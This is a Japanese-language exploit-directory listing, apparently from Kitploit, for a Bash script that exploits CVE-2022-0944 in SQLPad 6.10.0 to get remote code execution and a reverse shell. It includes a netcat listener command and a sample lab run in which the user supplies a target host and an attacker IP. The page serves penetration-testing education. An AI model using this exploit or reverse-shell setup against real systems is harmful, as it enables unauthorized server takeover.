Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SQLPad-6.10.0-Exploit-CVE-2022-0944 — Refurbish | Kitploit
ツール/GitHubGitHub/0xdtc/sqlpad-6.10.0-exploit-cve-2022-0944
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHub0xdtc/sqlpad-6.10.0-exploit-cve-2022-0944

SQLPad-6.10.0-Exploit-CVE-2022-0944

Refurbish

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11年前未レビュー

SQLPad 6.10.0 エクスプロイト (CVE-2022-0944)

このBashスクリプトは、SQLPad 6.10.0のRCE脆弱性を悪用し、攻撃者がSQLPadのMySQLデータベース接続設定におけるhostおよびdatabaseフィールドを悪用してリモートコード実行(RCE)を達成することを可能にします。このエクスプロイトは、Node.jsのchild_processモジュールに対する無害化されていない処理を利用して任意のコマンドを実行し、最終的に攻撃者のマシンにリバースシェルを開きます。

前提条件

  1. Netcatリスナー: nc -lvnp 9001でマシン上でリスナーをアクティブにしてください。
  2. ターゲットサーバーへのアクセス: このエクスプロイトは、脆弱なSQLPadインスタンスと通信できることを前提としています。

使用方法

  1. リポジトリをクローンする(またはスクリプトをローカルにコピーする)。
  2. スクリプトを実行する:
root@kitploit:~
┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com): 
x.example.com
Please provide your IP address (e.g., 10.10.16.3): 
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
  1. スクリプトのプロンプトに従い、ターゲットホストと自身のIPアドレスを入力し、リバースシェル接続を待ちます。

詳細

  • CVE: CVE-2022-0944
  • 影響を受けるバージョン: SQLPad 6.10.0
  • 脆弱性: テンプレートインジェクションによるリモートコード実行(RCE)
  • 影響: このエクスプロイトにより、攻撃者はSQLPadプロセスの権限でターゲットサーバー上でコマンドを実行できます。

免責事項

このコードは教育目的のみです。コンピュータシステムへの不正アクセスは違法です。許可を得た場合のみこのエクスプロイトを使用してください。

ツールをダウンロード